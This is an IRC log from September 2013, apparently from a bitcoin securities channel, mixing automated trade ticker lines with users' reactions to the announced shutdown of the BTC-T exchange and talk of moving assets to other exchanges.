135.00000, 24 hour vwap: 132.74875 Sep 23 02:23:15 [HAVELOCK] [CBTC] 2333 @ 0.00039002 = 0.9099 BTC [+] {2} Sep 23 02:26:18 [HAVELOCK] [AM1] 2 @ 1.76899999 = 3.538 BTC [+] Sep 23 02:31:23 [BTCTC] [ASICMINER-PT] 2 @ 1.627 = 3.254 BTC [-] Sep 23 02:32:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.01548 = 0.1548 BTC [+] Sep 23 02:32:24 [HAVELOCK] [AM1] 2 @ 1.76899999 = 3.538 BTC [+] Sep 23 02:33:24 [BTCTC] [TAT.ASICMINER] 40 @ 0.0156925 = 0.6277 BTC [+] {2} Sep 23 03:07:59 [BTCTC] [LABCOIN] 78 @ 0.002488 = 0.1941 BTC [+] Sep 23 03:10:01 [BTCTC] [ASICMINER-PT] 25 @ 1.60247998 = 40.062 BTC [-] {9} Sep 23 03:11:02 [BTCTC] [LABCOIN] 931 @ 0.00231501 = 2.1553 BTC [-] {3} Sep 23 03:13:04 [HAVELOCK] [AM1] 1 @ 1.76899999 BTC [+] Sep 23 03:30:21 [BTCTC] [ACTIVEMINING] 344 @ 0.001839 = 0.6326 BTC [+] Sep 23 03:31:22 [BTCTC] [ACTIVEMINING] 1056 @ 0.00184102 = 1.9441 BTC [+] {3} Sep 23 03:33:24 [BTCTC] [ACTIVEMINING] 288 @ 0.001842 = 0.5305 BTC [+] Sep 23 03:45:36 [BTCTC] [LABCOIN] 700 @ 0.002316 = 1.6212 BTC [+] {3} Sep 23 03:48:39 [HAVELOCK] [HIM] 1 @ 0.181 BTC [-] Sep 23 03:48:40 [BTCTC] [COGNITIVE] 42 @ 0.19469761 = 8.1773 BTC [+] {5} Sep 23 03:48:40 [BTCTC] [BASIC-MINING] 1 @ 0.111 BTC [-] **** BEGIN LOGGING AT Mon Sep 23 06:44:40 2013 Sep 23 06:50:36 [MPEX] [S.MPOE] 3503 @ 0.00092239 = 3.2311 BTC [-] Sep 23 06:55:41 [BTCTC] [LABCOIN] 2781 @ 0.00231726 = 6.4443 BTC [-] {2} Sep 23 06:55:42 [BTCTC] [ACTIVEMINING] 262 @ 0.001827 = 0.4787 BTC [-] Sep 23 06:57:42 [BTCTC] [LABCOIN] 1833 @ 0.00231711 = 4.2473 BTC [-] {2} Sep 23 06:59:44 [BTCTC] [LABCOIN] 3857 @ 0.002318 = 8.9405 BTC [+] Sep 23 07:00:46 [BTCTC] [LABCOIN] 51 @ 0.002319 = 0.1183 BTC [+] Sep 23 07:01:46 [BTCTC] [LABCOIN] 500 @ 0.002319 = 1.1595 BTC [+] Sep 23 07:09:55 [BTCTC] [LABCOIN] 26719 @ 0.0023098 = 61.7155 BTC [-] {13} Sep 23 07:11:57 [MPEX] [S.MPOE] 10900 @ 0.00092368 = 10.0681 BTC [+] {2} Sep 23 07:17:02 [BTCTC] [FN] [DMS.SELLING] 77 @ 0.0071 = 0.5467 BTC [+] Sep 23 07:18:03 [BTCTC] [LABCOIN] 3000 @ 0.00226965 = 6.809 BTC [-] {6} Sep 23 07:21:06 [BTCTC] [LABCOIN] 1300 @ 0.002262 = 2.9406 BTC [-] Sep 23 07:22:07 [BTCTC] [LABCOIN] 2315 @ 0.002262 = 5.2365 BTC [-] Sep 23 07:22:07 [HAVELOCK] [CBTC] 2000 @ 0.00039002 = 0.78 BTC [-] Sep 23 07:23:08 [HAVELOCK] [CBTC] 1071 @ 0.00039002 = 0.4177 BTC [-] Sep 23 07:23:09 [HAVELOCK] [NEOBEE] 70 @ 0.003 = 0.21 BTC [+] Sep 23 07:23:10 [BTCTC] [LABCOIN] 170 @ 0.002255 = 0.3834 BTC [-] Sep 23 07:27:12 [HAVELOCK] [HIM] 4 @ 0.181 = 0.724 BTC [-] Sep 23 07:36:21 [BTCTC] [ACTIVEMINING] 2183 @ 0.00191179 = 4.1734 BTC [+] {5} Sep 23 07:47:32 [BTCTC] [TAT.ASICMINER] 32 @ 0.01521 = 0.4867 BTC [+] Sep 23 07:47:33 sooo. has knc delivered yet ? Sep 23 07:53:38 [BTCTC] [S.BBET-PT] 198 @ 0.000716 = 0.1418 BTC [+] {2} Sep 23 07:57:42 [BTCTC] [LABCOIN] 597 @ 0.00236517 = 1.412 BTC [+] {4} Sep 23 08:12:58 [BTCTC] [FIMB] 79 @ 0.01065 = 0.8414 BTC [-] Sep 23 08:17:02 [BTCTC] [DMS.MINING] 270 @ 0.001571 = 0.4242 BTC [-] Sep 23 08:25:10 [BTCTC] [ACTIVEMINING] 400 @ 0.00192232 = 0.7689 BTC [+] {2} Sep 23 08:27:12 [BTCTC] [ACTIVEMINING] 81 @ 0.00191993 = 0.1555 BTC [+] {2} Sep 23 08:39:23 [BTCTC] [BTC-TRADING-PT] 10 @ 0.5102 = 5.102 BTC [-] {2} Sep 23 08:43:27 [BTCTC] [B] [CIPHERMINE.B1] 200 @ 0.0103 = 2.06 BTC [-] Sep 23 08:44:28 [BTCTC] [B] [CIPHERMINE.B1] 690 @ 0.01027131 = 7.0872 BTC [-] {4} Sep 23 08:48:32 [BTCTC] [LTC-ATF.B2] 117 @ 0.01080145 = 1.2638 BTC [-] {2} Sep 23 08:53:37 [MPEX] [S.MPOE] 8800 @ 0.00092506 = 8.1405 BTC [+] Sep 23 09:02:47 [BTCTC] [ASICMINER-PT] 1 @ 1.603 BTC [-] Sep 23 09:05:50 [BTCTC] [LTC-ATF.B2] 10 @ 0.0105 = 0.105 BTC [-] Sep 23 09:26:10 [HAVELOCK] [AM1] 1 @ 1.68000001 BTC [-] Sep 23 09:30:14 [HAVELOCK] [DEALCO] 200 @ 0.00999799 = 1.9996 BTC [-] Sep 23 09:33:17 [HAVELOCK] [CFIG] 21 @ 0.1442857 = 3.03 BTC [+] {2} Sep 23 09:34:18 [BTCTC] [FN] [DMS.SELLING] 400 @ 0.007156 = 2.8624 BTC [+] Sep 23 09:43:27 [HAVELOCK] [B] [XBOND] 450 @ 0.00119999 = 0.54 BTC [+] Sep 23 09:45:29 [HAVELOCK] [AM1] 1 @ 1.74999999 BTC [+] Sep 23 09:56:55 what will happen when trading resumes on btct Sep 23 10:00:45 [MPEX] [S.MPOE] 4800 @ 0.00092233 = 4.4272 BTC [-] Sep 23 10:10:43 https://bitcointalk.org/index.php?topic=125629.msg3214807#msg3214807 Sep 23 10:10:49 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 23 10:12:23 I guess there ended up being blood after all.... Sep 23 10:19:02 [BTCTC] [LABCOIN] 4607 @ 0.00025 = 1.1518 BTC [-] {2} Sep 23 10:21:04 [BTCTC] [LABCOIN] 501 @ 0.00035778 = 0.1792 BTC [+] {2} Sep 23 10:21:06 so what happens to my stocks Sep 23 10:23:06 [BTCTC] [LABCOIN] 7769 @ 0.00199902 = 15.5304 BTC [+] {6} Sep 23 10:24:07 [BTCTC] [LABCOIN] 4470 @ 0.00191 = 8.5377 BTC [-] {3} Sep 23 10:25:08 [BTCTC] [LABCOIN] 5530 @ 0.0019 = 10.507 BTC [-] {2} Sep 23 10:27:10 [BTCTC] [LABCOIN] 600 @ 0.0019 = 1.14 BTC [-] Sep 23 10:27:10 [BTCTC] [ASICMINER-PT] 2 @ 1.05 = 2.1 BTC [-] {2} Sep 23 10:31:14 [BTCTC] [LABCOIN] 25392 @ 0.00138652 = 35.2065 BTC [-] {13} Sep 23 10:31:45 well Sep 23 10:31:48 that was a surprise Sep 23 10:31:51 not really. Sep 23 10:32:13 Ukyo, is bitfunder in good shape, any crazyiness going on there? Sep 23 10:32:15 [HAVELOCK] [B] [XBOND] 2460 @ 0.00115579 = 2.8432 BTC [-] {15} Sep 23 10:32:16 [BTCTC] [LABCOIN] 4000 @ 0.001901 = 7.604 BTC [+] Sep 23 10:32:20 lots of crazyness Sep 23 10:32:24 how are there trades? Sep 23 10:32:44 locked, book wiped, trades reenabled Sep 23 10:32:58 why trade reenabled? Sep 23 10:33:02 it says all trade halted on the announce? Sep 23 10:33:03 x.x Sep 23 10:33:04 nfi Sep 23 10:33:06 two weeks until shut down Sep 23 10:33:12 yes but then reenabled after announce Sep 23 10:33:16 [HAVELOCK] [B] [XBOND] 10868 @ 0.00109255 = 11.8738 BTC [-] {15} Sep 23 10:33:31 "Effective immediately, in conjunction with this release, trading will be halted, all order books cleared, and trading re-enabled." Sep 23 10:33:32 "Effective immediately, in conjunction with this release, trading will be halted, all order books cleared, and trading re-enabled." Sep 23 10:33:32 why Sep 23 10:33:42 makes _no_ sense to clear the books Sep 23 10:33:43 who knows Sep 23 10:33:56 add to the confusion Sep 23 10:34:11 makes perfect sense, burnside clearly got layer fees to pay Sep 23 10:34:17 [BTCTC] [TAT.NEOBEE] 700 @ 0.0025 = 1.75 BTC [-] Sep 23 10:34:19 so did they have a breach or what. Sep 23 10:34:30 mircea_popescu: nah Sep 23 10:34:35 *lawyer Sep 23 10:34:39 if so it would have shut down completely Sep 23 10:34:59 this is something that was obviously planned Sep 23 10:35:04 o hey. so i guess that bet is yes huh Sep 23 10:35:11 i.e. 1. shutdown of user/asset reg, 2. request btc payout address Sep 23 10:35:18 [HAVELOCK] [CBTC] 10000 @ 0.00038219 = 3.8219 BTC [-] {6} Sep 23 10:36:19 [BTCTC] [LABCOIN] 758 @ 0.0018 = 1.3644 BTC [-] Sep 23 10:37:20 [MPEX] [S.MPOE] 3400 @ 0.00092215 = 3.1353 BTC [-] Sep 23 10:37:30 the two week notice is somewhat odd dont you think? Sep 23 10:37:39 why? Sep 23 10:38:21 [BTCTC] [LABCOIN] 28000 @ 0.00151822 = 42.5102 BTC [-] {14} Sep 23 10:39:08 just unexpected :) Sep 23 10:39:22 [BTCTC] [LABCOIN] 1392 @ 0.001702 = 2.3692 BTC [+] Sep 23 10:39:23 [HAVELOCK] [CBTC] 2370 @ 0.00038 = 0.9006 BTC [-] Sep 23 10:39:33 i usually tend to like giving a month, but two weeks is certainly not brusque or sudden. Sep 23 10:39:35 so i guess you need some additional servers for the load, ukyo ;) Sep 23 10:40:24 [BTCTC] [TAT.ASICMINER] 119 @ 0.00156007 = 0.1856 BTC [+] {3} Sep 23 10:40:24 [BTCTC] [LABCOIN] 2500 @ 0.0016 = 4 BTC [-] {2} Sep 23 10:40:24 [HAVELOCK] [CBTC] 26000 @ 0.00037004 = 9.621 BTC [-] {5} Sep 23 10:41:24 [BTCTC] [ACTIVEMINING] 971 @ 0.00120184 = 1.167 BTC [-] {2} Sep 23 10:41:26 [BTCTC] [LABCOIN] 5551 @ 0.00160674 = 8.919 BTC [+] {3} Sep 23 10:41:26 [BTCTC] [ASICMINER-PT] 9 @ 1.25955554 = 11.336 BTC [+] {5} Sep 23 10:42:10 dexX7: well see. Sep 23 10:42:19 mircea_popescu: depending on the circumstances Sep 23 10:42:26 [BTCTC] [ACTIVEMINING] 313 @ 0.00153194 = 0.4795 BTC [+] {3} Sep 23 10:42:26 [BTCTC] [ASICMINER-PT] 16 @ 1.20637498 = 19.302 BTC [-] {8} Sep 23 10:42:26 [BTCTC] [LABCOIN] 3949 @ 0.00166266 = 6.5658 BTC [+] {4} Sep 23 10:42:28 we saw what happened on glbse :P Sep 23 10:42:43 nef. made heh "quick work" Sep 23 10:42:44 :P Sep 23 10:42:57 still dont understand of resetting the books Sep 23 10:43:05 thats a good way to hurt the price of an asset Sep 23 10:43:27 [BTCTC] [LABCOIN] 3048 @ 0.001857 = 5.6601 BTC [+] {7} Sep 23 10:43:34 yup Sep 23 10:43:48 I guess he thought that it would be better then making the announcement and have people panic dump Sep 23 10:43:52 then agian, its not the first time recently LC has been interfeared with :P Sep 23 10:44:02 bobbabad: true Sep 23 10:44:22 people are panic dumping though so strategy did not work :P Sep 23 10:44:28 [BTCTC] [LABCOIN] 1091 @ 0.0017 = 1.8547 BTC [-] Sep 23 10:44:30 ppl are dumping on bf tho Sep 23 10:44:32 which is amusing Sep 23 10:44:38 lol Sep 23 10:44:58 anyway, let's hope people generally are learning lessons and intend to listen better. Sep 23 10:45:07 I would imagine the opposite should be happening Sep 23 10:45:13 bobbabad: meh. Sep 23 10:45:16 I guess the reason to clear the books was for the people who had open bids. I reckon you wouldn't want to be stuck getting dumped on when the panic sale starts. Sep 23 10:45:19 i coudl care less which way things move, as long as they keep moving Sep 23 10:45:20 :P Sep 23 10:45:27 good point rannasha Sep 23 10:45:29 [BTCTC] [ASICMINER-PT] 33 @ 1.48242422 = 48.92 BTC [+] {7} Sep 23 10:45:29 if movements stop, its bad news in too amny ways Sep 23 10:45:29 [BTCTC] [LABCOIN] 9773 @ 0.00154836 = 15.1321 BTC [-] {7} Sep 23 10:45:29 [BTCTC] [DMS.MINING] 173 @ 0.001 = 0.173 BTC [-] {2} Sep 23 10:45:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.015 = 0.15 BTC [+] Sep 23 10:45:47 Rannasha: i dunno, i wouldnt mind have a low bid filled Sep 23 10:45:48 Ukyo, I guess maybe now would be a good time to up the trade fee ;) Sep 23 10:45:56 bobbabad: roflol Sep 23 10:45:59 mircea_popescu the all mighty captain hindsight Sep 23 10:46:02 no : Sep 23 10:46:03 :P Sep 23 10:46:19 Ukyo: But what if you had a bid just below the current price for an asset that doesn't seem to have an easy way out when the exchange closes. Sep 23 10:46:21 wonder how much of the trash will end up on HL Sep 23 10:46:26 I am very picky about assets atm Sep 23 10:46:26 what's your experience with such incidends? will this drive all prices down, e.g. am? Sep 23 10:46:30 [BTCTC] [LABCOIN] 14724 @ 0.0013077 = 19.2546 BTC [-] {9} Sep 23 10:46:35 bobbabad not a matter of hindsight in any sense. you're just new and clueless. Sep 23 10:46:47 Rannasha: then you had faith in the asset enough to pay the price Sep 23 10:46:53 and leave it Sep 23 10:46:56 beit a dump or not Sep 23 10:47:06 you cant cater to day traders. Sep 23 10:47:31 [BTCTC] [LABCOIN] 5603 @ 0.00136498 = 7.648 BTC [+] {3} Sep 23 10:47:32 Ukyo, will labcoin be welcome to bf consider all the bs that has been going on with the issuer? Sep 23 10:47:56 They originally applied at BF Sep 23 10:48:05 oh? Sep 23 10:48:22 apparently there is alot of scrutiny when applying at BF, and things dont move 'fast enough' :P Sep 23 10:48:32 [BTCTC] [LABCOIN] 200 @ 0.001365 = 0.273 BTC [+] Sep 23 10:48:50 btct has good volume and trade fee income Sep 23 10:48:52 uh.. really? i thought it was the opposite, everyones welcome Sep 23 10:49:02 i doubt burnsy was wanting to shut down Sep 23 10:49:08 bobbabad: pfft no Sep 23 10:49:14 I got 4 new asset requests alone today Sep 23 10:49:26 i avg 1~3 tickets a day asking about starting an asset Sep 23 10:49:33 [BTCTC] [DMS.MINING] 1078 @ 0.001799 = 1.9393 BTC [+] {2} Sep 23 10:49:33 [BTCTC] [LABCOIN] 19437 @ 0.00130096 = 25.2868 BTC [-] {6} Sep 23 10:49:36 gotcha... Sep 23 10:49:48 will it be easy to xfer assets over to bitfunder? Sep 23 10:49:49 one today "I want to raise funds to buy mining equipment" .. .. "no." Sep 23 10:50:05 Do you also have a listing fee on BF? I reckon a listing fee keeps a large part of the hopeless ones away. Sep 23 10:50:10 thats good Sep 23 10:50:11 "I am looking for a loan." '.. .. who are you?' Sep 23 10:50:34 [BTCTC] [LABCOIN] 8400 @ 0.00136516 = 11.4673 BTC [+] {3} Sep 23 10:50:40 "I own a gold mine and need equipment" '.. .. in which game?' Sep 23 10:51:07 Rannasha 5btc, same as btct. Sep 23 10:51:15 btct raised from 2 or 3 btc to match mine actually Sep 23 10:51:32 I guess, to be fair it might be more credibility to bitfunder that way then a bunch of random LTC-global voting with what makes sense for their personal fincacial benefit Sep 23 10:51:35 [BTCTC] [ACTIVEMINING] 5070 @ 0.00121671 = 6.1687 BTC [-] {5} Sep 23 10:51:35 [BTCTC] [LABCOIN] 17716 @ 0.00130161 = 23.0593 BTC [-] {5} Sep 23 10:52:34 i thikn a trade freeze site-wide wold have been better than .. this. Sep 23 10:52:36 [BTCTC] [LABCOIN] 150 @ 0.001365 = 0.2048 BTC [+] Sep 23 10:52:46 if nef at least let ppl login and let ppl transfer shit Sep 23 10:52:49 he woulda been fine Sep 23 10:53:37 [BTCTC] [LABCOIN] 200 @ 0.00136462 = 0.2729 BTC [-] {2} Sep 23 10:53:37 [BTCTC] [BASIC-MINING] 10 @ 0.011 = 0.11 BTC [-] Sep 23 10:53:38 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.01011 = 0.5055 BTC [-] Sep 23 10:54:30 this is kinda silly... he started prepping for shutdown weeks ago.. but still encouraged ppl to download the 'new iphone app' x.x Sep 23 10:54:38 [BTCTC] [LABCOIN] 6101 @ 0.00134999 = 8.2363 BTC [-] {2} Sep 23 10:54:38 [BTCTC] [ASICMINER-PT] 3 @ 1.495 = 4.485 BTC [+] {2} Sep 23 10:54:38 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.0101 = 0.505 BTC [-] Sep 23 10:55:39 [BTCTC] [ASICMINER-PT] 1 @ 1.312 BTC [-] Sep 23 10:55:39 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.015 = 0.75 BTC [+] Sep 23 10:55:40 [BTCTC] [LABCOIN] 15000 @ 0.00135 = 20.25 BTC [+] Sep 23 10:56:02 what is [FN] ?? Sep 23 10:56:09 fund Sep 23 10:56:29 guess once btct is gone Sep 23 10:56:38 it will only be havelock and mpex announcing trades in here... Sep 23 10:56:40 [BTCTC] [ASICMINER-PT] 5 @ 1.3102 = 6.551 BTC [-] {2} Sep 23 10:56:40 [BTCTC] [FN] [BTC-GROWTH] 76 @ 0.0101071 = 0.7681 BTC [-] {3} Sep 23 10:56:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.018 = 0.9 BTC [+] Sep 23 10:57:17 but hey.. one less exchange means the btc price to get on assbot goes down Sep 23 10:57:18 :P Sep 23 10:57:41 [BTCTC] [ASICMINER-PT] 4 @ 1.29125 = 5.165 BTC [-] {2} Sep 23 10:57:41 [BTCTC] [LABCOIN] 20099 @ 0.00125029 = 25.1296 BTC [-] {2} Sep 23 10:57:51 lol Sep 23 10:57:56 i guess tha'ts true. Sep 23 10:58:23 sorry. tired. just poped to mind :P Sep 23 10:58:41 [BTCTC] [ACTIVEMINING] 900 @ 0.001225 = 1.1025 BTC [+] Sep 23 10:58:41 [BTCTC] [ASICMINER-PT] 10 @ 1.264 = 12.64 BTC [-] Sep 23 10:59:09 so btct is closing down? Sep 23 10:59:13 yes Sep 23 10:59:17 thats what it says Sep 23 10:59:42 [BTCTC] [TAT.ASICMINER] 39 @ 0.00818 = 0.319 BTC [-] Sep 23 10:59:42 [BTCTC] [ASICMINER-PT] 2 @ 1.263 = 2.526 BTC [-] Sep 23 11:00:01 fuck okey Sep 23 11:00:43 [BTCTC] [LABCOIN] 11302 @ 0.00125 = 14.1275 BTC [-] {3} Sep 23 11:00:43 [BTCTC] [ACTIVEMINING] 9089 @ 0.00100105 = 9.0985 BTC [-] {2} Sep 23 11:00:43 [BTCTC] [ASICMINER-PT] 4 @ 1.26 = 5.04 BTC [-] Sep 23 11:00:46 Party at Bitfunder tonight? Sep 23 11:00:57 i think so Sep 23 11:01:04 nah Sep 23 11:01:11 actualy quite sad Sep 23 11:01:17 if btct goes away Sep 23 11:01:21 bitfunder will be the next Sep 23 11:01:23 it means a huge loss of income for bf Sep 23 11:01:27 alot of volume will go to bf Sep 23 11:01:30 due to lack of arb trading Sep 23 11:01:33 there is no way to operate an exchange like this legaly Sep 23 11:01:39 VanCleef: the assets will have to be approved Sep 23 11:01:44 [BTCTC] [ASICMINER-PT] 2 @ 1.248 = 2.496 BTC [-] {2} Sep 23 11:01:44 [BTCTC] [LABCOIN] 300 @ 0.001202 = 0.3606 BTC [-] {2} Sep 23 11:01:45 [BTCTC] [DMS.MINING] 1900 @ 0.0019 = 3.61 BTC [+] Sep 23 11:01:51 i thikn half the assets on btct wont meet criteria Sep 23 11:01:56 which is why they ended up there Sep 23 11:02:07 sdfsdfs: sure there is. Sep 23 11:02:13 Lucky Bitfunder has been doing the hard yards ;) Sep 23 11:02:27 sdfsdfs: I am working on licensing. Sep 23 11:02:31 lol Sep 23 11:02:44 i have been invited to meet with some ministers mid/end october Sep 23 11:02:45 [BTCTC] [LABCOIN] 10000 @ 0.00120074 = 12.0074 BTC [-] {2} Sep 23 11:02:46 [BTCTC] [ASICMINER-PT] 15 @ 1.206 = 18.09 BTC [-] {3} Sep 23 11:02:48 then you have to get rid of 90% of the assets Sep 23 11:02:54 had to put them off because I could not meet before my tripe at begining of oct Sep 23 11:03:06 sdfsdfs: nah, i found a lot of liency where btc is involved Sep 23 11:03:20 most assets already meet the needed requirements Sep 23 11:03:33 too bad burnsides expensive laywers didn't find that Sep 23 11:03:36 those who dont will be forced into meeting said requirements, or get delisted. Sep 23 11:03:46 [BTCTC] [LABCOIN] 30230 @ 0.00120755 = 36.5042 BTC [+] {7} Sep 23 11:03:47 [BTCTC] [ASICMINER-PT] 7 @ 1.25971428 = 8.818 BTC [+] {3} Sep 23 11:03:47 [BTCTC] [FN] [BTC-GROWTH] 2 @ 0.095 = 0.19 BTC [+] Sep 23 11:03:48 [HAVELOCK] [AM1] 1 @ 1.62200001 BTC [-] Sep 23 11:04:07 I have said, i have noe spent more than 4x (easily) profits worth of income from BF on lawyers Sep 23 11:04:09 for legalization Sep 23 11:04:36 I wonder what he will do with this PT shares. Sep 23 11:04:40 for AM Sep 23 11:04:47 [HAVELOCK] [LABCO] 50 @ 0.00304998 = 0.1525 BTC [-] Sep 23 11:04:49 [BTCTC] [LABCOIN] 8013 @ 0.0012 = 9.6156 BTC [-] Sep 23 11:04:49 [BTCTC] [ASICMINER-PT] 3 @ 1.26 = 3.78 BTC [+] Sep 23 11:04:51 keep them Sep 23 11:04:54 I see FC getting many many many transfer requests :P Sep 23 11:05:01 sdfsdfs: lets hope not. Sep 23 11:05:09 he is an asshole Sep 23 11:05:16 WHAT THE FUCK!!!! Sep 23 11:05:19 which ? Sep 23 11:05:31 BTC-T shutting down? Sep 23 11:05:34 yes. Sep 23 11:05:36 are you fucking kidding me? Sep 23 11:05:44 mircea_popescu: remeber what i said before? symptoms akin to nefario? Sep 23 11:05:49 [BTCTC] [LABCOIN] 458 @ 0.0012 = 0.5496 BTC [-] Sep 23 11:05:49 San1ty__: no Sep 23 11:05:51 It's too late to get out of any of the assets I have... Sep 23 11:05:57 Everything is almost down 50% Sep 23 11:05:57 sites down Sep 23 11:05:59 trololol Sep 23 11:06:04 OH FUCK ITS OVER Sep 23 11:06:09 where is ThickerThanThiev Sep 23 11:06:15 VanCleef: works for me Sep 23 11:06:17 San1ty__: sleeping Sep 23 11:06:45 Well we got royally fucked... what are you guys doing with any assets at BTC-T? Sep 23 11:06:50 [BTCTC] [ASICMINER-PT] 8 @ 1.26 = 10.08 BTC [+] {2} Sep 23 11:06:50 [BTCTC] [TAT.NEOBEE] 1400 @ 0.0026 = 3.64 BTC [+] Sep 23 11:07:04 i just sold for a small loss, rather coins in hand than wait it out Sep 23 11:07:51 [BTCTC] [DMS.MINING] 200 @ 0.0017 = 0.34 BTC [-] Sep 23 11:07:51 [BTCTC] [LABCOIN] 245 @ 0.001249 = 0.306 BTC [+] Sep 23 11:07:51 [BTCTC] [ASICMINER-PT] 3 @ 1.26 = 3.78 BTC [+] Sep 23 11:07:56 Meh my loss is pretty big Sep 23 11:09:09 only thing i hold on there is am which can be transfered. labcoin which will be ??? and liek 6 pajka bond thingies i somehow ended up with Sep 23 11:09:53 [BTCTC] [DMS.MINING] 200 @ 0.001722 = 0.3444 BTC [+] Sep 23 11:09:53 [BTCTC] [ASICMINER-PT] 2 @ 1.56 = 3.12 BTC [+] Sep 23 11:09:53 [BTCTC] [TAT.NEOBEE] 2779 @ 0.0026 = 7.2254 BTC [+] {2} Sep 23 11:10:05 so whens labcoin going on bitfunder? Sep 23 11:10:28 well see Sep 23 11:10:34 with LC's communications Sep 23 11:10:37 they prolly wont know for a week Sep 23 11:10:37 :P Sep 23 11:10:54 [BTCTC] [DMS.MINING] 200 @ 0.001722 = 0.3444 BTC [+] Sep 23 11:10:54 [BTCTC] [LABCOIN] 868 @ 0.001101 = 0.9557 BTC [-] Sep 23 11:11:08 mircea_popescu will surely accept labcoin with open arms to mpex Sep 23 11:11:14 ROFLOL Sep 23 11:11:20 mircea_popescu:how bout it, you want labcoin ? :P Sep 23 11:11:37 I will entertain the idea if they meet the requirements Sep 23 11:11:48 like any other asset Sep 23 11:11:54 although, i hear its not hard to list on HL :P Sep 23 11:11:55 [BTCTC] [TAT.NEOBEE] 4310 @ 0.0026 = 11.206 BTC [+] Sep 23 11:11:55 [BTCTC] [LABCOIN] 955 @ 0.0011 = 1.0505 BTC [-] {2} Sep 23 11:11:55 [BTCTC] [ASICMINER-PT] 1 @ 1.49 BTC [-] Sep 23 11:11:56 [BTCTC] [TAT.ASICMINER] 29 @ 0.01038102 = 0.301 BTC [+] {3} Sep 23 11:11:58 so i fugre most will end up there Sep 23 11:12:09 what's hl? Sep 23 11:12:13 oh nvm Sep 23 11:12:24 have lock will use Sep 23 11:12:25 :P Sep 23 11:12:56 [BTCTC] [LABCOIN] 150 @ 0.001051 = 0.1577 BTC [-] Sep 23 11:13:57 [BTCTC] [LABCOIN] 3219 @ 0.00106113 = 3.4158 BTC [+] {5} Sep 23 11:13:57 [BTCTC] [DMS.MINING] 1000 @ 0.0015979 = 1.5979 BTC [-] {2} Sep 23 11:14:07 the most fucked ppl at btct are the ones who buy neo beo's ivpo Sep 23 11:14:09 I am more curious about DMS / deprived. Sep 23 11:14:17 I somehow doubt he will want to move to bf Sep 23 11:14:23 and even more so havelock Sep 23 11:14:38 possibly mpex ... though i recall him not sitting well with PR :P Sep 23 11:14:47 what is wrong with neo? the shares can easily transfered to havelock/bf Sep 23 11:14:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.01137625 = 0.182 BTC [+] {3} Sep 23 11:14:58 [BTCTC] [ASICMINER-PT] 20 @ 1.26719998 = 25.344 BTC [-] {7} Sep 23 11:14:58 [BTCTC] [LABCOIN] 3000 @ 0.001052 = 3.156 BTC [-] Sep 23 11:15:18 first ticket listing request has arrived. Sep 23 11:15:28 which one? :P Sep 23 11:15:29 which asset? Sep 23 11:15:33 cant say Sep 23 11:15:35 thats not proper. Sep 23 11:15:39 true dat Sep 23 11:15:40 i agree Sep 23 11:15:51 just found it amusing 1 minute ago i thought "any time now my phone will start blowing up with asset transfer requests" Sep 23 11:15:57 and then it beeps Sep 23 11:15:58 :P Sep 23 11:15:59 [BTCTC] [LABCOIN] 5290 @ 0.00105273 = 5.5689 BTC [+] {5} Sep 23 11:15:59 [BTCTC] [TAT.NEOBEE] 700 @ 0.00261 = 1.827 BTC [+] Sep 23 11:16:42 speaking of which Sep 23 11:16:52 which issue was it that had some major contract issue ? Sep 23 11:16:55 isser/asset Sep 23 11:16:58 mining asset Sep 23 11:17:00 [BTCTC] [ASICMINER-PT] 2 @ 1.221 = 2.442 BTC [-] Sep 23 11:17:35 lab/peta/bmf Sep 23 11:17:37 peta Sep 23 11:17:39 ah peta Sep 23 11:17:44 whats the deal with them? Sep 23 11:18:01 [BTCTC] [LABCOIN] 200 @ 0.001023 = 0.2046 BTC [-] Sep 23 11:20:03 [BTCTC] [DMS.MINING] 400 @ 0.001401 = 0.5604 BTC [-] Sep 23 11:20:03 [BTCTC] [ASICMINER-PT] 10 @ 1.22 = 12.2 BTC [-] Sep 23 11:20:52 they changed their contract during the IPO Sep 23 11:21:22 there is a bid for 1000 ltc-global shares at 25. probably the buyback Sep 23 11:21:35 Is labcoin currently operated anywhere else? Sep 23 11:21:48 San1ty__: only a PT on Havelock Sep 23 11:21:57 But that's backed by BTCT shares Sep 23 11:22:01 So no Sep 23 11:22:02 Haha :D Sep 23 11:22:21 I have a feeling that'll end up as a disaster Sep 23 11:23:06 [BTCTC] [TAT.NEOBEE] 300 @ 0.00261 = 0.783 BTC [+] Sep 23 11:23:06 [BTCTC] [ASICMINER-PT] 2 @ 1.215 = 2.43 BTC [-] Sep 23 11:23:07 did burnside say anything about his AM PT? Sep 23 11:23:11 no Sep 23 11:23:23 ugh Sep 23 11:23:26 so just to be clear.. trading will be enabled till 31th oct? Sep 23 11:23:33 why drop a bomb like that and then just go offline. Sep 23 11:24:07 [BTCTC] [ACTIVEMINING] 277 @ 0.001035 = 0.2867 BTC [+] Sep 23 11:24:17 might be a good time Sep 23 11:24:21 to pick up cheap shares tho Sep 23 11:25:08 [BTCTC] [TAT.NEOBEE] 385 @ 0.0026 = 1.001 BTC [-] Sep 23 11:25:08 [BTCTC] [ASICMINER-PT] 15 @ 1.215 = 18.225 BTC [-] Sep 23 11:25:29 dexX7: I think trading happens until 7th oct, after which you have until the end of the month to withdraw stuff, before the site goes black Sep 23 11:26:09 i was just wondering, because it's explicitly stated that "secondary market trading" will be halted on the 7th, which is option trading, right? Sep 23 11:26:09 [BTCTC] [DMS.MINING] 125 @ 0.0013 = 0.1625 BTC [-] Sep 23 11:26:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.01232 = 0.1602 BTC [+] Sep 23 11:26:11 [MPEX] [S.MPOE] 10000 @ 0.00092355 = 9.2355 BTC [+] {2} Sep 23 11:27:10 [BTCTC] [ACTIVEMINING] 100 @ 0.001021 = 0.1021 BTC [-] Sep 23 11:27:12 secondary market is anything not directly traded with the original issuer I believe Sep 23 11:27:18 so all exchanges Sep 23 11:27:26 not sure though Sep 23 11:27:29 he cant halt other exchanges Sep 23 11:27:31 has to be options trading Sep 23 11:28:11 [BTCTC] [ASICMINER-PT] 8 @ 1.22 = 9.76 BTC [+] Sep 23 11:28:12 [BTCTC] [BASIC-MINING] 9 @ 0.02651 = 0.2386 BTC [+] Sep 23 11:29:13 